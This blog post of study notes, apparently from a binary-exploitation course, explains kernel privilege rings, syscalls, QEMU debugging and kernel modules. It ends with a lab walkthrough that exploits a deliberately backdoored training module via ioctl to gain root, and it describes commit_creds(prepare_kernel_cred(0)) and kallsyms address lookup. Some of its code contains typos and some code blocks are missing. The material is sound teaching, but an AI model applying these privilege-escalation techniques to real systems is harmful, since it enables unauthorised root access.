The Kernel

Created On 04. Jul 2021

Updated: 2021-07-04 19:39:44.791038000 +0000

Created By: acidghost

Inside of every system there is a central body that manages the interaction between processes and external resources. This is the kernel.

External Resources

Examples of kernel-only resources:

  • hlt instruction: shuts CPU computation.
  • in and out instructions for interacting with hardware peripherals.

Special registers

How does the computer know whether your code can access these resources as for example mov register, cr3?

Kernel Access

The access model of a kernel is split into rings:

  • Ring 3 - userspace, very restricted. This is the least privileged ring where most of user action is executed and applications are run. This is the most commonly used ring by users, where we usually run browsers or play cool games.
  • Ring 2 - generally unused. Originally envisioned for device drivers that require a more elevated privilege access as for example executing instructions with the cr3 register.
  • Ring 1 - similar to ring 2.
  • Ring 0 - the Kernel. Unrestricted, supervisor mode. In this ring there is full access over bound hardware.
  • Ring -1 - hypervisor mode, used to handle sensitive actions on virtual machine level. Can intercept Ring 0, the actions of guest machine and handle them in the host OS.

The CPU tracks the current privilege level that controls the access to resources.

Kernels Types in Different OS

  • Monolithic Kernel - it's a single kernel binary that handles all OS-level tasks. Drivers are libraries loaded in the kernel and Linux runs on it.
  • Micorkernel - this is a tiny core binary that provides inter-process communication with the hardware. Drivers are user space programs with special user privileges. Run by Minux and seL4
  • Hybrid Kernel - a mix of microkernel and monolithic kernel features and components. Windows and MacOS run it.

Switching between rings

When the kernel boots up at Ring 0, it sets MSR_LSTAR to point to the syscall handler routine. When it wants to interact with the kernel it can call syscall. In this case happens next:

  1. Privilege sets to Ring 0.
  2. Control flow jumps to value of MSR_LSTAR.
  3. Return address saved to rcx.

You can find the core sudo code of syscall here.
When the Kernel is ready to return to userpace, it calls the appropriate return instruction. In such case the privilege level will switch to Ring 3 and control flow will jump to rcx.

Debugging the Kernel

First of all get yourself the qemu emulator which will emulate your kernel from here The build might fail for few reasons and if it happened to you, see the logs with dmesg. In my case it was quite straightforward, as I saw that the crash was caused by insufficient memory. I had my virtual memory at 3GB, however building the emulator requires at least 4. So, increasing your RAM to 4GB should eliminate one of the reasons why the kernel would fail to compile.
Let's also have an example ready. I will go with this example that I mentioned in Shellcoding.

.global _start
.intel_syntax noprefix
        mov rax, 60
        mov rdi, 42
        inc byte ptr [eip+8]
        mov word ptr [eip], 0x050e

Launch the kernel and then debug the running emulator with gdb linux5.4/vmlinux. This will throw us in the kernel space.

These addresses are insane! Now the emulator will hang and to act, continue in gdb with c. I launched the shellcode above in objdump to see the entry address and then broke there in gdb with break *0xaddress*. When launching the shellcode in the emulator, it will break at that address. Now we can see the shellcode.

We are outside of the emulator with gdb remotely attached to it, debugging a process inside it from the kernel space. With this certain shellcode it took me a while to si till I got there (ni could be possibly malfunctioning in this case), because we can see how the kernel acts to different instruction until hits the syscall entry point!

We are inside the syscall instruction! From there you will see many interesting things, for example upon the entry the return address is saved in rcx, which as how the kernel handles syscall when it switches between rings. This way you can debug anything and trace up to how the kernel acts without worrying about unintentionally destroying your system. Remember, you would want to be more specific about what you want to debug, so breaking at the exact addresses as was done above is a good way to apply this. Read more on debugging and kernel environment in the posts below.

Kernel Modules

Kernel modules are libraries that are loaded into the kernel. They are similar to libraries in userspace as libc. They have .ko extension and will be loaded and have the same privileges as the kernel. Kernel modules interact and implement different hardware and networking functionality.



Historically, kernel modules could add system call entries through a bit of effort by modifying the kernel's system call table. This is explicitly unsupported in modern kernels. Nowadays, it is usually used by rootkits to overwrite such functions to hide malicious activity from users.


Theoretically, a module could register an interrupt handler by using the LIDT and LGDT instructions and be triggered by, say, an int 42 instruction.
Useful one-byte interrupt instructions to hook:

  • int3 (0xcc): normally causes a SIGTRAP, but can be hooked!
  • int1 (0xf1): normally used for hardware debugging, but can be hooked!

Just with these two bytes, it is possible to create a check in how the kernel executes the functions and make sure that the control flow won't get hijacked.

A module can also hook the Invalid Opcode Exception Interrupt! It can be used to implement custom instructions in software for example for security retrofitting. However it is usually a bespoke interaction method.


The most common way of interacting with modules is via file!

  • /dev: mostly traditional devices (i.e., /dev/dsp for audio)
  • /proc: started out in System V Unix as information about running processes. Linux expanded it into in a disastrous mess of kernel interfaces. The solution...
  • /sys: non-process information interface with the kernel.

A module can register a file in one of the above locations. Userspace code can open() that file to interact with the module!

File read() and write()

One interaction mode is to handler read() and write() for your module's exposed file.
From kernel space:

static ssize_t device_read(struct file *filp, char *buffer, size_t length, loff_t *offset)
static ssize_t device_write(struct file *filp, const char *buf, size_t len, loff_t *off)

From user space:

fd = open("/dev/pwn-college", 0);
read(fd, buffer, 128);

Useful for modules that deal with streams (i.e., a stream of audio or video data). If for example there is a module of a specific hardware device, this is how someone would read() and write() to interact with it.

File ioctl()

ioctl() which stands for Input/Output Control is a syscall that provides a much more flexible interface. From kernel space:

static long device_ioctl(struct file *filp, unsigned int ioctl_num, unsigned long ioctl_param)

From user space:

int fd = open("/dev/pwn-college", 0);
ioctl(fd, COMMAND_CODE, &custom_data_structure);

Useful for setting and querying non-stream data (i.e., webcam resolution settings as opposed to webcam video stream).
A lot of vulnerabilities come from ioctl()!

Inside the Kernel

The kernel can do anything, and kernel modules in a monolithic kernel are the kernel. Typically, the kernel:

  1. reads data from userspace (using copy_from_user - this is how read() will be handled)
  2. "does stuff" (open files, read files, interact with hardware, etc)
  3. writes data to userspace (using copy_to_user - this is how write() will be handled)
  4. returns to userspace
Explore Them!

In the emulator mentioned above you can find few kernel modules:

  • hello_log: demonstrates the simplest possible kernel module
  • hello_dev_char: demonstrates a module exposing a /dev character device
  • hello_ioctl: exposes a /dev device with ioctl interface
  • hello_proc_char: exposes a /proc device
  • make_root: exposes a /proc device with ioctl interface and an evil backdoor!
Module Compilation

You will find in the /src path of the emulator a Makefile. Then you can create your own module and append its name with the .o extension in the Makefile. Then you build it again and it will deployed in the fresh user space filesystem. Remember, the userspace in the emulator is non persistent.

Kernel modules can be loaded using the init_module system call, usually done through the insmod utility. A kernel would be loaded with insmod mymodule.ko. List them with lsmod and remove with rmmod mymodule.ko.
Bonus! cat will run forever in the emulator, so to read just once, you can use the dd utility and output the content to file descriptor 1:

dd if=/inputf file of=/proc/self/fd/1 bs=128 count=1

Exploiting the Kernel

There are various attack vectors from which the kernel can exploited such as:

  1. Network
  2. Userspace (even from sandbox!)
  3. From devices (usbs..)

Usually this is done to crash the system, escalate priviliges, rootkits, gain access on other parts of the system and so on.


  • copy_to_user(userspace_address, kernel_address, length);
  • copy_from_user(kernel_address, userspace_address, length);

This is how the kernel handles interactions between the kernel and userspace. The functions above are similar to memcpy() and should be handled.

Kernel memory must be kept uncorrupted! Corruption can:

  • crash the system
  • brick the system
  • escalate process privileges
  • interfere with other processes

All user data should be only accessed with copy_to_user and copy_from_user.

Race Conditions

Kernel modules are not userspace programs.

  • they are always prone to multi-threading
  • they could disappear or swap resources mid-execution

Race conditions are huge problems plaguing kernels!

Privilege Escalation

The kernel tracks user the privileges (and other data) of every running process. The kernel tracks a task_struct:

struct task_struct {
	 * For reasons of header soup (see current_thread_info()), this
	 * must be the first element of task_struct.
	struct thread_info		thread_info;
	/* -1 unrunnable, 0 runnable, >0 stopped: */
	volatile long			state;

	 * This begins the randomizable portion of task_struct. Only
	 * scheduling-critical items should be added above here.

	void				*stack;
	refcount_t			usage;
	/* Per task flags (PF_*), defined further below: */
	unsigned int			flags;
	unsigned int			ptrace;


	/* Process credentials: */

	/* Tracer's credentials at attach: */
	const struct cred __rcu		*ptracer_cred;

	/* Objective and real subjective task credentials (COW): */
	const struct cred __rcu		*real_cred;

	/* Effective (overridable) subjective task credentials (COW): */
	const struct cred __rcu		*cred;

	/* Cached requested key. */
	struct key			*cached_requested_key;

As seen, it has a lot of information that defines different priorities, specific behaviors, alignments etc. and the credentials of the process which are stored in the cred struct:

struct cred {
	atomic_t	usage;
	atomic_t	subscribers;	/* number of processes subscribed */
	void		*put_addr;
	unsigned	magic;
#define CRED_MAGIC	0x43736564
#define CRED_MAGIC_DEAD	0x44656144
	kuid_t		uid;		/* real UID of the task */
	kgid_t		gid;		/* real GID of the task */
	kuid_t		suid;		/* saved UID of the task */
	kgid_t		sgid;		/* saved GID of the task */
	kuid_t		euid;		/* effective UID of the task */
	kgid_t		egid;		/* effective GID of the task */
	kuid_t		fsuid;		/* UID for VFS ops */
	kgid_t		fsgid;		/* GID for VFS ops */
	unsigned	securebits;	/* SUID-less security management */
	kernel_cap_t	cap_inheritable; /* caps our children can inherit */
	kernel_cap_t	cap_permitted;	/* caps we're permitted */
	kernel_cap_t	cap_effective;	/* caps we can actually use */
	kernel_cap_t	cap_bset;	/* capability bounding set */
	kernel_cap_t	cap_ambient;	/* Ambient capability set */

The credentials are supposed to be immutable (i.e., they can be cached elsewhere, and shouldn't be updated in place). Instead, they can be replaced:

commit_creds(struct cred *)

The cred struct seems a bit complex, but the kernel can make us a fresh one!

struct cred * prepare_kernel_cred(struct task_struct *reference_task_struct)

Luckily, if we pass NULL to the reference struct, it'll give us a cred struct with root access and full privileges! This can be achieved with:


Let's check it in action in our emulator. In the source file of the emulator in src/make_root.c you will find the file we will work with:

The code above creates a device "pwn-college-root" in /proc, then registers some operations for it and then the ioctl() handler. It means that if the octal number of PWN and a parameter of 0x13371337 is used it will grant us root access. Crazy right? To exploit this, we need to create a program that opens "pwn-college-root" and triggers the correct ioctl_num and ioctl_param which will make the process to become root! We don't know the parameter of PWN, so we need to reverse engineer this from the module. Upon objdumping the src/make_root.ko file, we see:

We can see in the device_ioctl function how ebp is compared against 0x7001. epb comes from esi, which is the second argument. We have our argument for PWN. First create a new file locally with vi attack.c and write the exploit.

#include <asserth.h>
int main() {
	int fd = open("/proc/pwn-college-root", 0); / open in only-read mode
	assert(fd > 0);
	printf("Before Uid: %d\n", getuid()); /help text to see our euid before
	ioctl(fd, 0x7001, 0x13371337); / passing in the params
	printf("AFTER Uid: %d\n", getuid()); /help text to see our euid after

compile statically because there are no libraries inside the emulator:

gcc -static attack attack.c

Then launch the emulator, load the kernel with insmod make_root.ko, switch to ctf user with su - ctf, launch the "attack" file and observe privilege escalation against the kernel in action. After that we can even launch /bin/sh from inside the C program and it won't drop the privileges since commit_creds(prepare_kernel_cred(0)); will 0 out everything which will be set to *ID of 0 :grin:


How do we know where commit_creds and prepare_kernel_cred are in memory?
Older kernels (or newer kernels when the kernel ASLR - kASLR is disabled) are mapped at predictable locations. Do you remember the old IOT joke? It is likely that in most embedded devices the kASLR will also be disabled. We can also use /proc/kallsym which is an interface for the kernel to give root these addresses. If you are root, it is possible to find the address of commit_cred with cat /proc/kallsyms | grep commit_cred. Debugging as we did above is an available option as well. Otherwise, it's the exact same problem as userspace ASLR! (see Memory Errors)


Section: Binary Exploitation (PWN)